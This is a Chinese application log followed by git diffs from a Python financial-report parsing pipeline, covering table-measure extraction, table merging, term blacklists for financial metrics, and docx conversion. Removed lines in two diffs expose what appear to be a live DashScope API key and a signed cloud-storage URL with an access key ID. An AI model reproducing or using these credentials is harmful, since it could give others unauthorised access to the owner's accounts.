2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:29,637|zzb_logger : INFO 提取指标任务 70-80 (39120)...
2024-12-29 16:18:42,814|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:46,511|zzb_logger : INFO 提取指标 40-50 runs 20.96 seconds.
2024-12-29 16:18:54,027|zzb_logger : INFO 提取指标 70-80 runs 24.39 seconds.
2024-12-29 16:19:17,236|zzb_logger : INFO 提取指标 60-70 runs 48.93 seconds.
2024-12-29 16:19:20,151|zzb_logger : INFO 提取指标 30-40 runs 55.96 seconds.
2024-12-29 16:19:40,383|zzb_logger : INFO 提取指标 50-60 runs 73.47 seconds.
2024-12-29 16:20:06,573|zzb_logger : INFO 提取指标 0-10 runs 106.39 seconds.
2024-12-29 16:20:44,937|zzb_logger : INFO 提取指标 10-20 runs 143.36 seconds.
2024-12-29 16:20:50,959|zzb_logger : INFO 提取指标 20-30 runs 148.11 seconds.
2024-12-29 16:20:51,337|zzb_logger : INFO 表格指标抽取完成任务ID:201917
2024-12-29 16:20:51,337|zzb_logger : INFO 表格指标抽取 201917 完成耗时153.23 秒。
2024-12-29 16:20:51,337|zzb_logger : INFO 启动这个指标归一化任务ID-修改测试:201917
2024-12-29 16:20:51,549|zzb_logger : INFO 目录黑名单为:[]
2024-12-29 16:20:52,316|zzb_logger : INFO 向量配置数据查询 0.11 秒。
2024-12-29 16:20:52,317|zzb_logger : INFO insert_table_measure_from_vector_async_process方法走的半年报
2024-12-29 16:20:54,191|zzb_logger : INFO Run task 0-351 (41216)...
2024-12-29 16:20:54,192|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:54,742|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:20:55,664|zzb_logger : INFO Run task 351-702 (16388)...
2024-12-29 16:20:55,664|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:56,152|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:20:57,120|zzb_logger : INFO Run task 702-1053 (41796)...
2024-12-29 16:20:57,120|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:57,611|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:20:58,818|zzb_logger : INFO Run task 1053-1404 (39320)...
2024-12-29 16:20:58,818|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:59,324|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:00,159|zzb_logger : INFO Run task 1404-1755 (41868)...
2024-12-29 16:21:00,159|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:00,887|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:01,473|zzb_logger : INFO Run task 1755-2106 (26816)...
2024-12-29 16:21:01,473|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:02,171|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:02,832|zzb_logger : INFO Run task 2106-2457 (32120)...
2024-12-29 16:21:02,832|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:03,703|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:04,179|zzb_logger : INFO 等待所有子任务完成任务ID:201917
2024-12-29 16:21:04,179|zzb_logger : INFO Run task 2457-2815 (38332)...
2024-12-29 16:21:04,179|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:04,886|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:23:00,285|zzb_logger : INFO 所有子任务完成任务ID:201917
2024-12-29 16:23:00,286|zzb_logger : INFO 启动指标归一化任务ID:201917
2024-12-29 16:23:00,286|zzb_logger : INFO 向量更新时间 127.97 秒。
2024-12-29 16:23:00,474|zzb_logger : INFO 更新数据查询 0.17 秒。
2024-12-29 16:23:00,474|zzb_logger : INFO update_ori_measure方法走的是半年报
2024-12-29 16:23:00,474|zzb_logger : INFO 更新数据更新 0.00 秒。
2024-12-29 16:23:00,522|zzb_logger : INFO 更新数据写入 0.05 秒。
2024-12-29 16:23:00,522|zzb_logger : INFO 归一化完成任务ID:201917
2024-12-29 16:23:00,522|zzb_logger : INFO 任务 201917 完成耗时344.83 秒。
2024-12-29 16:23:00,669|zzb_logger : INFO 通知任务状态url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=1
2024-12-29 16:23:00,669|zzb_logger : INFO 通知任务状态任务:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code: 404</p>
<p>Message: File not found.</p>
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
</body>
</html>
2024-12-29 16:23:00,821|zzb_logger : INFO 任务 201917 完成

View File

@ -427,19 +427,18 @@ def process_text_content(file_id,texts,tables,full_texts,type =0):
                 "type" : "text",
                 'content' : line_text,
             }},conn,cursor,"word_parse_process")
-
             # For the sensitive-word (慎用词) check
             db_service_word.insert_word_parse_process({
                 'file_id': file_id,
                 'page_num': t["index"],
                 'page_count': 100,
                 'type': 'text',
                 'content': {
                     'page_num': t["index"],
                     'table_index': t["index"],
                     "type": "text",
                     'content': line_text,
             }}, conn, cursor, "word_parse_data")
     table_name = "word_text_info"
     if type == 1:
@ -519,12 +518,12 @@ def get_table_measure(file_id, word_tables, record_range):
     record_start = record_range.split('-')[0]
     record_end = record_range.split('-')[1]
     for index in range(int(record_start),int(record_end)):
-        t = word_tables[index]
+        t = word_tables[index][0]
         measure_obj =[]
         data_dict = {}
         measure_list = []
         try:
-            arr = np.array(t['data'])
+            arr = np.array(t["data"])
             rows, cols = arr.shape
             if rows == 1 and cols == 1:
                 continue
@ -679,7 +678,7 @@ def update_measure_data(file_id,file_path,parent_table_pages):
     # Create a cursor object to execute SQL statements
     cursor_app = conn_app.cursor(buffered=True)
     applog.info(f'目录黑名单为:{parent_table_pages}')
-    db_service_word.delete_to_run(conn,cursor,file_id)
+    # db_service_word.delete_to_run(conn,cursor,file_id)
     db_service_word.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path)
 
     # # Measure normalization
@ -692,15 +691,39 @@ def update_measure_data(file_id,file_path,parent_table_pages):
 
 def merge_consecutive_arrays(word_info):
     merged_objects = []
+    temp_list = []
     for info_obj in word_info:
         try:
             if info_obj['type'] == 'table':
                 # If the object is a table, collect it for merging
-                merged_objects.append(info_obj)
+                data = info_obj['data']
+                if not data:
+                    continue
+                first_row = data[0]
+                if all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) == 0:
+                    temp_list.append(info_obj)
+                elif all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
+                    merged_objects.append(temp_list)
+                    temp_list = []
+                    temp_list.append(info_obj)
+                elif not all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
+                    temp_data = temp_list[-1]['data']
+                    temp_data = list(temp_data)
+                    for row in list(info_obj['data']):
+                        temp_data.append(row)
+                    info_obj['data'] = temp_data
+                    temp_list.clear()
+                    temp_list.append(info_obj)
         except Exception as e:
             applog.error(f"解析数据错误: {e}")
+    if temp_list:
+        merged_objects.append(temp_list)
     return merged_objects
 
 def merge_consecutive_arrays_v1(pdf_info):
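The rewritten merge_consecutive_arrays above implements a header/continuation heuristic: a table whose first row (ignoring the first cell) is all Chinese text starts a new group, while a first row without Chinese text is treated as a numeric continuation and its rows are appended to the previous fragment. A standalone sketch of just that heuristic, simplified (no temp_list grouping, no logging):

# Standalone sketch of the header/continuation heuristic, simplified.
import re

def is_header_row(row):
    # header rows carry Chinese labels in every cell after the first
    return all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in row[1:])

def merge_tables(tables):
    merged = []
    for data in tables:
        if not data:
            continue
        if not is_header_row(data[0]) and merged:
            merged[-1].extend(data)    # continuation: append to previous table
        else:
            merged.append(list(data))  # header row: start a new table
    return merged

tables = [
    [['项目', '期末', '期初'], ['货币资金', '100', '90']],
    [['固定资产', '50', '40']],        # fragment split off by a page break
]
print(merge_tables(tables))            # -> one merged three-row table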
@ -775,7 +798,6 @@ def start_table_measure_job(file_id):
     records_range_parts = utils.get_range(len(word_tables),MEASURE_COUNT)
     processes = []
     for record_range in records_range_parts:
-        # get_table_measure(file_id,word_tables,record_range,)
         p = Process(target=get_table_measure, args=(file_id,word_tables,record_range,))
         processes.append(p)
         p.start()

View File

@ -252,8 +252,8 @@ def append_to_file(file_path, text):
 
 if __name__ == "__main__":
     current_directory = os.getcwd()
-    docx_relative_path = 'file/docx/101.docx'
-    file_relative_path = 'file/docx/test1.txt'
+    docx_relative_path = '..\\file\\docx\\101.docx'
+    file_relative_path = '..\\file\\docx\\test1.txt'
     docx_path = os.path.join(current_directory, docx_relative_path)
     file_path = os.path.join(current_directory, file_relative_path)
     try:

View File

@ -1,22 +1,20 @@
-from http import HTTPStatus
-import dashscope
-#
-# dashscope.api_key='sk-2d6352a4c9b142f58b75cd9c8222bd91'
-# messages = [{'role': 'system', 'content': 'You are a helpful assistant.'},
-#             {'role': 'user', 'content': '如何做西红柿鸡蛋?'}]
-#
-# response = dashscope.Generation.call(
-#     model='qwen-turbo',
-#     messages=messages,
-#     result_format='message',  # set the result to be "message" format.
-# )
-#
-# if response.status_code == HTTPStatus.OK:
-#     print(response)
-# else:
-#     print('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
-#         response.request_id, response.status_code,
-#         response.code, response.message
-#     ))
-print("sdas00"*2)
+from dashscope import BatchTextEmbedding
+import requests
+
+def call():
+    result = BatchTextEmbedding.call(BatchTextEmbedding.Models.text_embedding_async_v1,
+                                     url="https://modelscope.oss-cn-beijing.aliyuncs.com/resource/text_embedding_file.txt",
+                                     # url='http://127.0.0.1:text_embedding_file.txt'
+                                     text_type="document")
+    url = result.output.url
+    response = requests.get(url)
+    # Check whether the request succeeded
+    if response.status_code == 200:
+        # Grab the returned text content
+        html_content = response.text
+        print(html_content)
+
+if __name__ == '__main__':
+    call()

View File

@ -7,9 +7,14 @@ import json
 from datetime import datetime
 import re,os,time
 import requests
-import config
 import numpy as np
+from docx2pdf import convert
+
+from config import api_key
+
+dashscope.api_key = api_key
 
 def get_md5(str):
     import hashlib
@ -53,8 +58,7 @@ def get_clean_text(text):
     #terms_3 = ["固定资产","短期借款","合同负债","在建工程","商誉"]
     # Terms like 同比 (YoY change) must not appear here
     terms_4 = ['', '', '','','年以内','年以上','年内','1-2年','2-3年','3-4年','4-5年','准备','在途','增值','评估','利息','应计','改良','跌价','补助','投资']
-    dates = [ "2021年12月31日","2022年12月31日","2022年1月1日","2023年1月1日", "2023年12月31日",
-             "2022年6月30日","2023年6月30日","2024年6月30日","2024年半年度","2023年半年度","2022年半年度"]
+    dates = [ "2021年12月31日","2022年12月31日","2022年1月1日","2023年1月1日", "2023年12月31日", "2022年6月30日","2023年6月30日","2024年6月30日","2024年半年度","2023年半年度","2022年半年度"]
     #dates = [ "2021年12月31日","2022年12月31日","2023年12月31日","2022年1月1日","2023年1月1日", "2024年1月1日", "2022年6月30日","2023年6月30日","2024年6月30日","2021年初","2022年初","2023年初","2024年初",'2021年末','2022年末','2023年末','2024年末',"2023年","2022年","2021年"]
     if any(term in text for term in terms_4):
         return text
@ -90,7 +94,7 @@ def get_clean_text(text):
         return pattern.sub(lambda match: replacements[match.group(0)], text)
     text = replace_all(text, replacement_dict)
     # Strip a standalone "12月31日" that has no year in front of it
-    pattern_year = r'(?<!2023年|2022年|2021年)12月31日'
+    pattern_year = r'(?<!2026年|2025年|2024年|2023年|2022年|2021年)12月31日'
     text = re.sub(pattern_year, '', text)
 
     pattern = r"\[^]*\|\([^)]*\)"  # also match English (half-width) parentheses
@ -111,7 +115,7 @@ def get_clean_text(text):
         "": "",
         "年内到期":"年内到期",
         "16月":"",
         "发行新股":"发行新股",
     }
     # Inspect the bracketed content of the text
     for match in matches:
@ -129,6 +133,21 @@ def get_clean_text(text):
     text = re.sub(r"[^\w\s]", "", text)
     return text
 
+def convert_docx_to_pdf(file_path):
+    # Check that the file is in .docx format
+    if file_path.lower().endswith('.docx'):
+        # Build the output PDF path
+        pdf_path = os.path.splitext(file_path)[0] + '.pdf'
+        try:
+            # Run the conversion
+            convert(file_path, pdf_path)
+            print(f"转换成功: {pdf_path}")
+        except Exception as e:
+            print(f"转换失败: {e}")
+    else:
+        print("错误: 文件必须是 .docx 格式。")
+
 def save_pdf_from_url(url, file_path):
     from urllib.parse import unquote
     # Send a GET request and save the file
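A hedged usage note for the convert_docx_to_pdf helper added in this hunk: docx2pdf drives a local Microsoft Word installation, so the conversion only works where Word is available; the path below is hypothetical.

# Hypothetical usage of the convert_docx_to_pdf helper added above.
convert_docx_to_pdf('C:\\reports\\101.docx')  # writes C:\reports\101.pdf next to the source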
@ -142,9 +161,10 @@ def save_pdf_from_url(url, file_path):
     # Extract the file name from the processed URL
     # (file name extraction)
     file_name = url_without_params.split('/')[-1]
-    #https://financial-report-test.obs.cn-east-3.myhuaweicloud.com:443/upload/file/909f3dd3337a4dd4bc24fb4748c6c76e.PDF?AccessKeyId=IIDIMIUZ1UBBVPKIVB4W&Expires=1726798358&Signature=fKgrDPjmd99Nje4wwvBJxmFlXZY%3D
     # Local path where the file is saved
     local_file_path = file_path + file_name
+    # local_file_path = convert_docx_to_pdf(local_file_path)
 
     with open(local_file_path, 'wb') as file:
         file.write(response.content)
@ -279,20 +299,39 @@ def check_black_list(meta_measure, pdf_measure, black_array):
 
 def check_black_list_old(meta_measure,pdf_measure):
     # Check whether the measure name contains a blacklisted word
     #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
-    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
-    ,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润','扣非净利润:净资产,净利率,年度公司'
-    ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
-    ,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除','非经常性损益:扣除非经常性损益'
-    ,'基本每股收益:稀释每股收益,发行新股','稀释每股收益:基本每股收益,发行新股','总资产:净资产','应收账款:应付账款,年以上,内,至,到'
-    ,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到','应付账款:应收账款,年以上,内,至,到','长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押','研发投入:比例,比率,占比,费用,占'
-    ,'资本化研发投入:比例,比率,占比,费用,占','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用'
-    ,'上年年末:1月1日','期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
+    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计'
+    ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
+    ,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润'
+    ,'扣非净利润:净资产,净利率,年度公司'
+    ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除'
+    ,'筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
